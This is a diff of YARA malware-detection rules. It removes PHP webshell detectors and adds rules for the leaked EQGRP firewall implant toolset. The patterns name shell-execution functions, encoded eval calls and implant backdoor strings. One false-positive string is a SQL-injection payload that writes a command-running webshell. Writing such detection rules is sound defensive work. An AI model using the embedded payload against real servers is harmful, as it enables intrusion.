-		quality = -8
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "1214e282ac7258e616ebd76f912d4b2455d1b415b7216823caa3fc0d09045a5f"
+		hash2 = "c8a151df7605cb48feb8be2ab43ec965b561d2b6e2a837d645fdf6a6191ab5fe"
 
 	strings:
-		$decode1 = "base64_decode" fullword nocase wide ascii
-		$decode2 = "openssl_decrypt" fullword nocase wide ascii
-		$one1 = "leGVj"
-		$one2 = "V4ZW"
-		$one3 = "ZXhlY"
-		$one4 = "UAeABlAGMA"
-		$one5 = "lAHgAZQBjA"
-		$one6 = "ZQB4AGUAYw"
-		$two1 = "zaGVsbF9leGVj"
-		$two2 = "NoZWxsX2V4ZW"
-		$two3 = "c2hlbGxfZXhlY"
-		$two4 = "MAaABlAGwAbABfAGUAeABlAGMA"
-		$two5 = "zAGgAZQBsAGwAXwBlAHgAZQBjA"
-		$two6 = "cwBoAGUAbABsAF8AZQB4AGUAYw"
-		$three1 = "wYXNzdGhyd"
-		$three2 = "Bhc3N0aHJ1"
-		$three3 = "cGFzc3Rocn"
-		$three4 = "AAYQBzAHMAdABoAHIAdQ"
-		$three5 = "wAGEAcwBzAHQAaAByAHUA"
-		$three6 = "cABhAHMAcwB0AGgAcgB1A"
-		$four1 = "zeXN0ZW"
-		$four2 = "N5c3Rlb"
-		$four3 = "c3lzdGVt"
-		$four4 = "MAeQBzAHQAZQBtA"
-		$four5 = "zAHkAcwB0AGUAbQ"
-		$four6 = "cwB5AHMAdABlAG0A"
-		$five1 = "wb3Blb"
-		$five2 = "BvcGVu"
-		$five3 = "cG9wZW"
-		$five4 = "AAbwBwAGUAbg"
-		$five5 = "wAG8AcABlAG4A"
-		$five6 = "cABvAHAAZQBuA"
-		$six1 = "wcm9jX29wZW"
-		$six2 = "Byb2Nfb3Blb"
-		$six3 = "cHJvY19vcGVu"
-		$six4 = "AAcgBvAGMAXwBvAHAAZQBuA"
-		$six5 = "wAHIAbwBjAF8AbwBwAGUAbg"
-		$six6 = "cAByAG8AYwBfAG8AcABlAG4A"
-		$seven1 = "wY250bF9leGVj"
-		$seven2 = "BjbnRsX2V4ZW"
-		$seven3 = "cGNudGxfZXhlY"
-		$seven4 = "AAYwBuAHQAbABfAGUAeABlAGMA"
-		$seven5 = "wAGMAbgB0AGwAXwBlAHgAZQBjA"
-		$seven6 = "cABjAG4AdABsAF8AZQB4AGUAYw"
-		$eight1 = "ldmFs"
-		$eight2 = "V2YW"
-		$eight3 = "ZXZhb"
-		$eight4 = "UAdgBhAGwA"
-		$eight5 = "lAHYAYQBsA"
-		$eight6 = "ZQB2AGEAbA"
-		$nine1 = "hc3Nlcn"
-		$nine2 = "Fzc2Vyd"
-		$nine3 = "YXNzZXJ0"
-		$nine4 = "EAcwBzAGUAcgB0A"
-		$nine5 = "hAHMAcwBlAHIAdA"
-		$nine6 = "YQBzAHMAZQByAHQA"
-		$execu1 = "leGVjd"
-		$execu2 = "V4ZWN1"
-		$execu3 = "ZXhlY3"
-		$esystem1 = "lc3lzdGVt"
-		$esystem2 = "VzeXN0ZW"
-		$esystem3 = "ZXN5c3Rlb"
-		$opening1 = "vcGVuaW5n"
-		$opening2 = "9wZW5pbm"
-		$opening3 = "b3BlbmluZ"
-		$fp1 = { D0 CF 11 E0 A1 B1 1A E1 }
-		$fp2 = "YXBpLnRlbGVncmFtLm9"
-		$fp3 = " GET /"
-		$fp4 = " POST /"
-		$fpa1 = "/cn=Recipients"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$x1 = "* Not attempting to execute \"%s\" command" fullword ascii
+		$x2 = "TERMINATING SCRIPT (command error or \"quit\" encountered)" fullword ascii
+		$x3 = "execute code in <file> passing <argX> (HEX)" fullword ascii
+		$x4 = "* Use arrow keys to scroll through command history" fullword ascii
+		$s1 = "pitCmd_processCmdLine" fullword ascii
+		$s2 = "execute all commands in <file>" fullword ascii
+		$s3 = "__processShellCmd" ascii
+		$s4 = "pitTarget_getDstPort" fullword ascii
+		$s5 = "__processSetTargetIp" ascii
+		$o1 = "Logging commands and output - ON" fullword ascii
+		$o2 = "This command is too dangerous.  If you'd like to run it, contact the development team" fullword ascii
 
 	condition:
-		filesize < 300KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not any of ( $fp* ) and any of ( $decode* ) and ( ( any of ( $one* ) and not any of ( $execu* ) ) or any of ( $two* ) or any of ( $three* ) or ( any of ( $four* ) and not any of ( $esystem* ) ) or ( any of ( $five* ) and not any of ( $opening* ) ) or any of ( $six* ) or any of ( $seven* ) or any of ( $eight* ) or any of ( $nine* ) )
+		( uint16( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 4 of them ) or 1 of ( $o* )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Unknown_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Bananausurper_Writejetplow : FILE
 {
 	meta:
-		description = "obfuscated php webshell"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "93d01a4c-4c18-55d2-b682-68a1f6460889"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L872-L894"
+		description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130"
+		author = "Florian Roth (Nextron Systems)"
+		id = "901af182-cbfa-533a-a055-565d95005d62"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1009-L1028"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "12ce6c7167b33cc4e8bdec29fb1cfc44ac9487d1"
-		hash = "cf4abbd568ce0c0dfce1f2e4af669ad2"
-		logic_hash = "ce2d4c87c001a45febf7eac5474aa0d24ea73067f9154203ef5653bf77e7028f"
+		logic_hash = "101e75800291a7603e03145bff298d7587c9b5f19102e7ba9ed3bf2b544fa5cf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$sp0 = /^<\?php \$[a-z]{3,30} = '/ wide ascii
-		$sp1 = "=explode(chr(" wide ascii
-		$sp2 = "; if (!function_exists('" wide ascii
-		$sp3 = " = NULL; for(" wide ascii
+		$x1 = "Implant Version-Specific Values:" fullword ascii
+		$x2 = "This function should not be used with a Netscreen, something has gone horribly wrong" fullword ascii
+		$s1 = "createSendRecv: recv'd an error from the target." fullword ascii
+		$s2 = "Error: WatchDogTimeout read returned %d instead of 4" fullword ascii
 
 	condition:
-		filesize < 300KB and all of ( $sp* )
+		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Eval : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen4 : FILE
 {
 	meta:
-		description = "Generic PHP webshell which uses any eval/exec function in the same line with user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "79cfbd88-f6f7-5cba-a325-0a99962139ca"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L896-L955"
+		description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8b2061f0-862d-51de-a7d0-7a36d3e71d61"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1030-L1051"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a61437a427062756e2221bfb6d58cd62439d09d9"
-		hash = "90c5cc724ec9cf838e4229e5e08955eec4d7bf95"
-		hash = "2b41abc43c5b6c791d4031005bf7c5104a98e98a00ee24620ce3e8e09a78e78f"
-		hash = "5c68a0fa132216213b66a114375b07b08dc0cb729ddcf0a29bff9ca7a22eaaf4"
-		hash = "de3c01f55d5346577922bbf449faaaaa1c8d1aaa64c01e8a1ee8c9d99a41a1be"
-		hash = "124065176d262bde397b1911648cea16a8ff6a4c8ab072168d12bf0662590543"
-		hash = "cd7450f3e5103e68741fd086df221982454fbcb067e93b9cbd8572aead8f319b"
-		hash = "ab835ce740890473adf5cc804055973b926633e39c59c2bd98da526b63e9c521"
-		hash = "31ff9920d401d4fbd5656a4f06c52f1f54258bc42332fc9456265dca7bb4c1ea"
-		hash = "64e6c08aa0b542481b86a91cdf1f50c9e88104a8a4572a8c6bd312a9daeba60e"
-		hash = "80e98e8a3461d7ba15d869b0641cdd21dd5b957a2006c3caeaf6f70a749ca4bb"
-		hash = "93982b8df76080e7ba4520ae4b4db7f3c867f005b3c2f84cb9dff0386e361c35"
-		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
-		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
-		hash = "7ca5dec0515dd6f401cb5a52c313f41f5437fc43eb62ea4bcc415a14212d09e9"
-		hash = "fd5f0f81204ca6ca6e93343500400d5853012e88254874fc9f62efe0fde7ab3c"
-		hash = "883f48ed4e9646da078cabf6b8b4946d9f199660262502650f76450ecf60ddd5"
-		hash = "6d042b6393669bb4d98213091cabe554ab192a6c916e86c04d06cc2a4ca92c00"
-		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
-		logic_hash = "4b7759e4761f5897bfb5e576df645a2e99cec4e703fb28d0fc275cf8f8848263"
+		logic_hash = "3bfcef33e9a0a1753fd21458ee3173284f98942d30a496c5183c79a7df960208"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash3 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash4 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
 
 	strings:
-		$geval = /\b(exec|shell_exec|passthru|system|popen|proc_open|pcntl_exec|eval|assert)[\t ]{0,300}(\(base64_decode)?(\(stripslashes)?[\t ]{0,300}(\(trim)?[\t ]{0,300}\(\$(_POST|_GET|_REQUEST|_SERVER\s?\[['"]HTTP_|GLOBALS\[['"]_(POST|GET|REQUEST))/ wide ascii
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$gfp_3 = " GET /"
-		$gfp_4 = " POST /"
+		$s1 = "Command has not yet been coded" fullword ascii
+		$s2 = "Beacon Domain  : www.%s.com" fullword ascii
+		$s3 = "This command can only be run on a PIX/ASA" fullword ascii
+		$s4 = "Warning! Bad or missing Flash values (in section 2 of .dat file)" fullword ascii
+		$s5 = "Printing the interface info and security levels. PIX ONLY." fullword ascii
 
 	condition:
-		filesize < 300KB and not ( any of ( $gfp* ) ) and $geval
+		( uint16( 0 ) == 0x457f and filesize < 3000KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Double_Eval_Tiny : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen3 : FILE
 {
 	meta:
-		description = "PHP webshell which probably hides the input inside an eval()ed obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "868db363-83d3-57e2-ac8d-c6125e9bdd64"
-		date = "2021-01-11"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L957-L1008"
+		description = "EQGRP Toolset Firewall"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ec64bb2b-566b-50b6-a518-222afc88d400"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1053-L1076"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f66fb918751acc7b88a17272a044b5242797976c73a6e54ac6b04b02f61e9761"
-		hash = "6b2f0a3bd80019dea536ddbf92df36ab897dd295840cb15bb7b159d0ee2106ff"
-		hash = "aabfd179aaf716929c8b820eefa3c1f613f8dcac"
-		hash = "9780c70bd1c76425d4313ca7a9b89dda77d2c664"
-		hash = "006620d2a701de73d995fc950691665c0692af11"
-		logic_hash = "cf0405e8a44497574d75291bf86bf9413d9a64140e820f7f5a655fe5302c6918"
+		logic_hash = "32d4dd0e35ea480199f5b2032145326c3eef73243783c580605a4de6877df982"
 		score = 75
-		quality = 42
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
-
-	strings:
-		$payload = /(\beval[\t ]{0,500}\([^)]|\bassert[\t ]{0,500}\([^)])/ nocase wide ascii
-		$fp1 = "clone" fullword wide ascii
-		$fp2 = "* @assert" ascii
-		$fp3 = "*@assert" ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+
+	strings:
+		$x1 = "incomplete and must be removed manually.)" fullword ascii
+		$s1 = "%s: recv'd an error from the target." fullword ascii
+		$s2 = "Unable to fetch the address to the get_uptime_secs function for this OS version" fullword ascii
+		$s3 = "upload/activate/de-activate/remove/cmd function failed" fullword ascii
 
 	condition:
-		filesize > 70 and filesize < 300 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and #payload >= 2 and not any of ( $fp* )
+		( uint16( 0 ) == 0x457f and filesize < 6000KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC : FILE
+rule SIGNATURE_BASE_EQGRP_BLIAR_BLIQUER : FILE
 {
 	meta:
-		description = "PHP webshell obfuscated"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f66e337b-8478-5cd3-b01a-81133edaa8e5"
-		date = "2021-01-12"
-		modified = "2024-03-11"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1010-L1136"
+		description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6f83bb11-f789-544e-8dca-c2dc2c845331"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1078-L1111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "eec9ac58a1e763f5ea0f7fa249f1fe752047fa60"
-		hash = "181a71c99a4ae13ebd5c94bfc41f9ec534acf61cd33ef5bce5fb2a6f48b65bf4"
-		hash = "76d4e67e13c21662c4b30aab701ce9cdecc8698696979e504c288f20de92aee7"
-		hash = "1d0643927f04cb1133f00aa6c5fa84aaf88e5cf14d7df8291615b402e8ab6dc2"
-		logic_hash = "8d7150a4fc657efe3526d5f8f624a66e7186a3f42b4605cc349bd31deeb71b7f"
+		logic_hash = "59b7303dba0a79919d79627697a8724337145cd6d7b5c53cda970bf437162865"
 		score = 75
-		quality = -23
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
 
 	strings:
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$o1 = "chr(" nocase wide ascii
-		$o2 = "chr (" nocase wide ascii
-		$o3 = "goto" fullword nocase wide ascii
-		$o4 = "\\x9" wide ascii
-		$o5 = "\\x3" wide ascii
-		$o6 = "\\61" wide ascii
-		$o7 = "\\44" wide ascii
-		$o8 = "\\112" wide ascii
-		$o9 = "\\120" wide ascii
-		$fp1 = "$goto" wide ascii
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$x1 = "Do you wish to activate the implant that is already on the firewall? (y/n): " fullword ascii
+		$x2 = "There is no implant present on the firewall." fullword ascii
+		$x3 = "Implant Version :%lx%lx%lx" fullword ascii
+		$x4 = "You may now connect to the implant using the pbd idkey" fullword ascii
+		$x5 = "No reply from persistant back door." fullword ascii
+		$x6 = "rm -rf pbd.wc; wc -c %s > pbd.wc" fullword ascii
+		$p1 = "PBD_GetVersion" fullword ascii
+		$p2 = "pbd/pbdEncrypt.bin" fullword ascii
+		$p3 = "pbd/pbdGetVersion.pkt" fullword ascii
+		$p4 = "pbd/pbdStartWrite.bin" fullword ascii
+		$p5 = "pbd/pbd_setNewHookPt.pkt" fullword ascii
+		$p6 = "pbd/pbd_Upload_SinglePkt.pkt" fullword ascii
+		$s1 = "Unable to fetch hook and jmp addresses for this OS version" fullword ascii
+		$s2 = "Could not get hook and jump addresses" fullword ascii
+		$s3 = "Enter the name of a clean implant binary (NOT an image):" fullword ascii
+		$s4 = "Unable to read dat file for OS version 0x%08lx" fullword ascii
+		$s5 = "Invalid implant file" fullword ascii
 
 	condition:
-		not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( not $fp1 and ( ( filesize < 20KB and ( ( #o1 + #o2 ) > 50 or #o3 > 10 or ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 20 ) ) or ( filesize < 200KB and ( ( #o1 + #o2 ) > 200 or #o3 > 30 or ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 30 ) ) ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) )
+		( uint16( 0 ) == 0x457f and filesize < 3000KB and ( 1 of ( $x* ) or 1 of ( $p* ) ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Encoded : FILE
+rule SIGNATURE_BASE_EQGRP_Sploit : FILE
 {
 	meta:
-		description = "PHP webshell obfuscated by encoding"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "134c1189-1b41-58d5-af66-beaa4795a704"
-		date = "2021-04-18"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1138-L1189"
+		description = "EQGRP Toolset Firewall - from files sploit.py, sploit.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f403965-5fb1-55b2-bef6-65c18e08e58f"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1113-L1135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "119fc058c9c5285498a47aa271ac9a27f6ada1bf4d854ccd4b01db993d61fc52"
-		hash = "d5ca3e4505ea122019ea263d6433221030b3f64460d3ce2c7d0d63ed91162175"
-		hash = "8a1e2d72c82f6a846ec066d249bfa0aaf392c65149d39b7b15ba19f9adc3b339"
-		logic_hash = "c2a88e48374f949fcc9c14b773f7709c96b3147d1982ae9721708474ee5a3dcd"
-		score = 70
-		quality = -64
+		logic_hash = "083f103dee6b209626c4d790dff0e53af757945ded63409b26bbe143c78e30eb"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
+		hash2 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
 
 	strings:
-		$enc_eval1 = /(e|\\x65|\\101)(\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ wide ascii nocase
-		$enc_eval2 = /(\\x65|\\101)(v|\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ wide ascii nocase
-		$enc_assert1 = /(a|\\97|\\x61)(\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ wide ascii nocase
-		$enc_assert2 = /(\\97|\\x61)(s|\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ wide ascii nocase
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s1 = "print \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii
+		$s2 = "@overridable(\"Must be overriden if the target will be touched.  Base implementation should not be called.\")" fullword ascii
+		$s3 = "@overridable(\"Must be overriden.  Base implementation should not be called.\")" fullword ascii
+		$s4 = "exp.load_vinfo()" fullword ascii
+		$s5 = "if not okay and self.terminateFlingOnException:" fullword ascii
+		$s6 = "print \"[-] keyboard interrupt before response received\"" fullword ascii
+		$s7 = "if self.terminateFlingOnException:" fullword ascii
+		$s8 = "print 'Debug info ','='*40" fullword ascii
 
 	condition:
-		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $enc* )
+		( uint16( 0 ) == 0x2123 and filesize < 90KB and 1 of ( $s* ) ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Encoded_Mixed_Dec_And_Hex : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen2 : FILE
 {
 	meta:
-		description = "PHP webshell obfuscated by encoding of mixed hex and dec"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9ae920e2-17c8-58fd-8566-90d461a54943"
-		date = "2021-04-18"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1191-L1247"
+		description = "EQGRP Toolset Firewall"
